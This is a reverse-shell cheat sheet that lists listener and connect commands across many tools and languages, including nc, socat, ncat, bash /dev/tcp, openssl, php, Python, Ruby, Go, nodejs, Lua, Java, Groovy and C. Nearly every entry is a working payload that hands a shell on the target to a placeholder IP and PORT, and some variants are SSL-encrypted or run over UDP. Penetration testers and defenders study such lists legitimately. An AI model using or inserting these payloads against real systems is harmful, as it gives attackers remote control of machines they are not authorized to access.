Reverse shells cheatsheet

nc

listen:

nc -nl PORT

connect:

nc -e /bin/sh IP PORT
nc -c sh IP PORT

nc without -e and -c options

connect:

rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc IP PORT >/tmp/f

connect, one-liner:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f

socat

listen:

socat tcp-listen:PORT -

connect:

socat exec:/bin/sh tcp:IP:PORT

connect, exec command using system:

socat system:/bin/sh tcp:IP:PORT

Fork

handle arriving connections in a child process and keep parent process listening:

socat tcp-listen:PORT,fork -




With pseudo terminal (PTY)

listen:

socat file:`tty`,raw,echo=0 tcp-listen:PORT

connect:

socat exec:/bin/sh,pty,stderr,setsid,sigint,sane tcp:IP:PORT

SSL-encrypted

Generate certificate:

openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem

listen:

socat openssl-listen:PORT,cert=cert.pem,key=key.pem,verify=0,fork -

connect:

socat openssl:IP:PORT,verify=0 exec:/bin/bash

ncat

listen

ncat --allow IP -nl PORT

connect:

ncat --exec /bin/sh IP PORT

SSL-encrypted

listen:

ncat --allow IP -vnl PORT --ssl

connect:

ncat --exec /bin/sh --ssl IP PORT

UDP

listen:

ncat -ulnvp PORT

connect:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|ncat -u IP PORT >/tmp/f

sbd

sbd package

listen:

sbd -lp PORT

connect:

sbd -e /bin/sh HOST PORT

encrypted

listen:

sbd -l -c on -k ENCRYPTION_PHRASE -p PORT

connect:

sbd -k ENCRYPTION_PHRASE -e /bin/sh HOST PORT

bash

listen, using for example nc:

nc -nl PORT

connect:

bash -i >& /dev/tcp/IP/PORT 0>&1
bash -i 5<> /dev/tcp/IP/PORT 0<&5 1>&5 2>&5

or connect with bash -c:

bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'

UDP

listen, using for example nc:

nc -nul PORT

connect:

sh -i >& /dev/udp/IP/PORT 0>&1





Openssl

listen:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port PORT

connect:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect IP:PORT > /tmp/s; rm /tmp/s

whois

listen (socat):

socat tcp-listen:8090,fork,reuseaddr -

Usage: type the command, press enter and then press CTRL+D.

connect:

while true; do X=`eval $(whois -h IP -p PORT "Output: $X")`; sleep 1; done




php

listen, using for example nc:

nc -nl PORT

connect (exec):

php -r '$sock=fsockopen("IP", PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

connect (shell_exec):

php -r '$sock=fsockopen("IP", PORT);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

connect (system):

php -r '$sock=fsockopen("IP", PORT);system("/bin/sh -i <&3 >&3 2>&3");'

connect (passthru):

php -r '$sock=fsockopen("IP", PORT);passthru("/bin/sh -i <&3 >&3 2>&3");'

connect (popen):

php -r '$sock=fsockopen("IP", PORT);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

connect (proc_open):

php -r '$sock=fsockopen("IP", PORT);proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

connect (backticks):

php -r '$sock=fsockopen("IP", PORT);`/bin/sh -i <&3 >&3 2>&3`;'

Python

listen, using for example nc:

nc -nl PORT

connect with Python script:

#!/usr/bin/env python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP", PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

One-liner (python -c)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP", PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'









Ruby

listen, using for example nc:

nc -nl PORT

connect script:

#!/usr/bin/ruby
require 'socket';
c=TCPSocket.new('IP', PORT)
$stdin.reopen(c)
$stdout.reopen(c)
$stderr.reopen(c)
$stdin.each_line{|l|l=l.strip;next if l.length==0;(IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }

connect, one-liner (sh):

ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("IP", PORT))'

connect, one-liner (popen):

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("IP",PORT);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Go lang

listen, using for example nc:

nc -nl PORT

create rev.go file:

package main;
import"os/exec";
import"net";
func main(){c,_:=net.Dial("tcp","IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}

build and run:

go run rev.go

connect, one-liner:

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

nodejs

listen, using for example nc:

nc -nl PORT

create file rev.js script:

var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(PORT, "IP", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});

one-liner:

require("child_process").exec('bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"')

connect running the script:

nodejs rev.js




one-liners from CLI

connect, exec:

node -e 'require("child_process").exec(`bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"`)'

connect, single quotes:

node -e '(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(PORT, "IP", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();'

connect, double quotes:

node -e "(function(){ var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []); var client = new net.Socket(); client.connect(IP, 'PORT', function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();"

connect, backticks:

node -e '(function(){ var net = require(`net`), cp = require(`child_process`), sh = cp.spawn(`/bin/sh`, []); var client = new net.Socket(); client.connect(IP, `PORT`, function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();'

connect, HEREDOC:

node - <<EOF
(function(){ var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []); var client = new net.Socket(); client.connect(PORT, 'IP', function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();
EOF

Lua

listen, using for example nc:

nc -nl PORT

connect (os.execute):

lua -e "local socket = require('socket');require('os');t=socket.tcp();t:connect('IP','PORT');os.execute('/bin/sh -i <&3 >&3 2>&3');"

connect (popen):

lua -e 'local host, port = "IP", PORT local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'





Java

listen, using for example nc:

nc -nl PORT





create file Rev.java:

Linux

Runtime exec:

public class Rev {
    public static void main(String[] args) {
        Process p;
        try {
            p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/IP/PORT 0>&1");
            p.waitFor();
            p.destroy();
        } catch (Exception e) {}
    }
}

ProcessBuilder:

import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;

public class Rev {
  public static void main(String[] args) {
    String host="IP";
    int port=PORT;
    String cmd="/bin/sh";
    try {
      Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
    } catch (Exception e) {}
  }
}

Windows

ProcessBuilder:

import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;

public class Rev {
  public static void main(String[] args) {

    String host="IP";
    int port=PORT;
    String cmd="cmd.exe";
    try {
      Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
    } catch (Exception e) {}
  }
}

Compile and connect

compile:

javac Rev.java

connect:

java Rev







Groovy

listen, using for example nc:

nc -nl PORT







create a rev.groovy file:

Linux

String host="IP";
int port=PORT;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Windows

String host="IP";
int port=PORT;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

connect:

groovy rev.groovy







C

create a rev.c file:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void) {
    int sockfd;
    int lport = PORT;
    struct sockaddr_in serv_addr;
    char *const params[] = {"/bin/sh", NULL};
    char *const environ[] = {NULL};

    sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = inet_addr("IP");
    serv_addr.sin_port = htons(lport);
    connect(sockfd, (struct sockaddr *) &serv_addr, 16);

    dup2(sockfd, 0);
    dup2(0, 1);
    dup2(0, 2);
    execve("/bin/sh", params, environ);
}

Compile and connect

compile:

gcc rev.c -o rev

connect:

./rev







References